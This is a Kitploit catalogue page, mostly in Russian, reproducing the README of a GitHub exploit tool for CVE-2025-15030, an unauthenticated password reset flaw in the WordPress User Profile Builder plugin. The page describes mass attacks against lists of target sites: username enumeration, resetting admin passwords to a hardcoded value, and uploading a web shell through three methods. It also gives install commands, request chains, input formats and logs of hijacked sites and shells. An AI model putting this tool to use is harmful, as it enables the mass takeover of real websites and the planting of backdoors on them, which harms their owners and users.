Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-15030 — User Profile Builder < 3.15.2 - Неаутентифицированный произвольный сброс пароля | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-15030
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2025-15030

CVE-2025-15030

User Profile Builder < 3.15.2 - Неаутентифицированный произвольный сброс пароля

Репозиторий
1195 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-15030

User Profile Builder < 3.15.2 - Unauthenticated Arbitrary Password Reset

CVE-2025-15030

User Profile Builder — Unauthenticated Password Reset → Admin Takeover + Shell Upload

 ____  _     _____      ____  ____  ____  ____        _  ____  ____ _____  ____
/   _\/ \ |\/  __/     /_   \/  _ \/_   \/ ___\      / \/ ___\/  _ \\__  \/  _ \
|  /  | | //|  \ _____  /   /| / \| /   /|    \_____ | ||    \| / \|  /  || / \|
|  \__| \// |  /_\____\/   /_| \_/|/   /_\___ |\____\| |\___ || \_/| _\  || \_/|
\____/\__/  \____\     \____/\____/\____/\____/      \_/\____/\____//____/\____/

CVE CVSS Plugin Auth Python Author


❶ Уязвимость

ПолеДетали
CVECVE-2025-15030
CVSS9.8 КРИТИЧЕСКАЯ — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ADPCISA-ADP
ПлагинUser Profile Builder для WordPress
Затронутые версииВсе версии до 3.15.2
АутентификацияНе требуется
ТипНекорректный сброс пароля — неаутентифицированный захват учётной записи
CWECWE-640 · Слабый механизм восстановления пароля

Основная причина:
В процессе восстановления пароля плагина Profile Builder (action2=recover_password2) не выполняется надлежащая проверка ключа сброса и не применяется срок действия токена. Отправляя специально сформированный POST-запрос с действительным password_recovery_nonce_field2, извлечённым со страницы сброса, неаутентифицированный злоумышленник может установить новый пароль для любого пользователя WordPress — включая администраторов — зная только его имя пользователя. Никакого взаимодействия по электронной почте или действительного токена сброса не требуется.


❷ Что делает инструмент

Этот инструмент реализует две независимые цепочки атак для каждой цели, за которыми следует опциональное развёртывание оболочки:

┌────────────────────────────────────────────────────────────────────┐
│  ЦЕПОЧКА 1 · CORE  (злоупотребление нативным сбросом wp-login)    │
│                                                                    │
│  POST /wp-login.php?action=lostpassword  (запуск сброса)          │
│  GET  /wp-login.php?action=rp&key=...    (переход по ссылке сброса)│
│  POST /wp-login.php?action=resetpass     (внедрение нового пароля)│
│  Перебор имён пользователей  →  строгий вход  →  проверка /wp-admin/ │
├────────────────────────────────────────────────────────────────────┤
│  ЦЕПОЧКА 2 · PB  (сброс Profile Builder из ссылки)               │
│                                                                    │
│  Загрузка URL сброса из pb_reset_links.txt                        │
│  GET  <reset_url>  →  извлечение nonce + userData                 │
│  POST action2=recover_password2  →  установка нового пароля       │
│  Строгий вход  →  проверка доступа к /wp-admin/                   │
├────────────────────────────────────────────────────────────────────┤
│  ЗАГРУЗКА ОБОЛОЧКИ  (выполняется после любого подтверждённого     │
│                       захвата администратора)                     │
│                                                                    │
│  Метод 1  →  plugin-install.php загрузка  (Nxploited.zip)         │
│  Метод 2  →  REST API  /wp-json/wp/v2/plugins                    │
│  Метод 3  →  Редактор плагинов/тем  (прямая запись Nx.php)       │
│  Проверка →  GET /wp-content/plugins/Nxploited/Nx.php             │
│  Журнал   →  scan_results/shells.txt                             │
└────────────────────────────────────────────────────────────────────┘

❸ Установка

git clone https://github.com/Nxploited/CVE-2025-15030.git
cd CVE-2025-15030
pip install -r requirements.txt

requirements.txt

requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
rich>=13.0.0

Поместите Nxploited.zip в ту же папку, что и скрипт, чтобы разрешить загрузку оболочки. Инструмент работает и без этого файла, но развёртывание оболочки будет пропущено.


❹ Использование

python3 CVE-2025-15030.py

Запросы

Файл со списком целей (один URL на строку):            list.txt
Потоки (одновременные сайты) [5]:                      5
Тайм-аут HTTP (секунды) [10]:                          10
Выходной файл для успешных сбросов через wp-login:     scan_results/wp_login_reset_success.txt
Выходной файл для оболочек Nxploited:                  scan_results/shells.txt
Файл со ссылками сброса Profile Builder (опционально): pb_reset_links.txt

Пароль, используемый для всех попыток сброса и входа, задан внутри:

Nxploited_adminSA

❺ Входные файлы

list.txt — Цели (обязательно)

https://target1.com
target2.com
http://target3.com/wordpress

pb_reset_links.txt — Ссылки сброса Profile Builder (опционально)

Если вы захватили ссылки для сброса пароля из писем Profile Builder, вставьте их сюда по одной на строку. Инструмент выполнит:

  1. Загрузит страницу сброса и извлечёт password_recovery_nonce_field2 + userData
  2. Отправит новый пароль через action2=recover_password2
  3. Попытается выполнить строгий вход администратора с новыми учётными данными
https://target1.com/wp-login.php?action=rp&key=ABC123&login=admin
https://target2.com/?page_id=5&action=recover_password&key=XYZ&login=editor

❻ Перебор имён пользователей

Инструмент автоматически обнаруживает имена пользователей WordPress, используя три метода перед попыткой входа:

МетодКонечная точка
Перенаправление автора/?author=1 → /?author=10
REST API/wp-json/wp/v2/users
Эвристика имени хостаПервая метка доменного имени
Резервный вариант по умолчаниюadmin всегда включён

❼ Проверка администратора

Каждая попытка входа строго проверяется перед записью результатов. Инструмент проверяет:

/wp-admin/index.php       →  id="adminmenu", id="wpadminbar"
/wp-admin/users.php       →  users.php indicator
/wp-admin/plugins.php     →  plugins.php indicator
/wp-admin/plugin-install.php  →  upload-plugin, plugin-install-tab

Результат записывается на диск только при подтверждении ≥ 3 маркеров администратора.


❽ Методы загрузки оболочки

После подтверждённой сессии администратора инструмент последовательно пытается использовать три метода эскалации:

МетодКонечная точкаТриггер
Загрузка плагина/wp-admin/update.php?action=upload-pluginЗагружает Nxploited.zip через форму установки
REST API/wp-json/wp/v2/pluginsПрямой POST ZIP-файла
Запись через редактор/wp-admin/plugin-editor.phpЗаписывает Nx.php через редактор файлов

Проверка оболочки: GET /wp-content/plugins/Nxploited/Nx.php → HTTP 200


❾ Выходные файлы

ФайлСодержимое
scan_results/wp_login_reset_success.txtПодтверждённые захваты администратора через цепочку CORE
scan_results/shells.txtURL развёрнутых оболочек с учётными данными

Формат

wp_login_reset_success.txt

[2025-06-01T14:22:10] https://target.com | https://target.com/wp-login.php | account=admin  pass=Nxploited_adminSA

shells.txt

[2025-06-01 14:22:18] https://target.com - admin:Nxploited_adminSA - SHELL: https://target.com/wp-content/plugins/Nxploited/Nx.php

❿ Формат вывода терминала

Скачать инструмент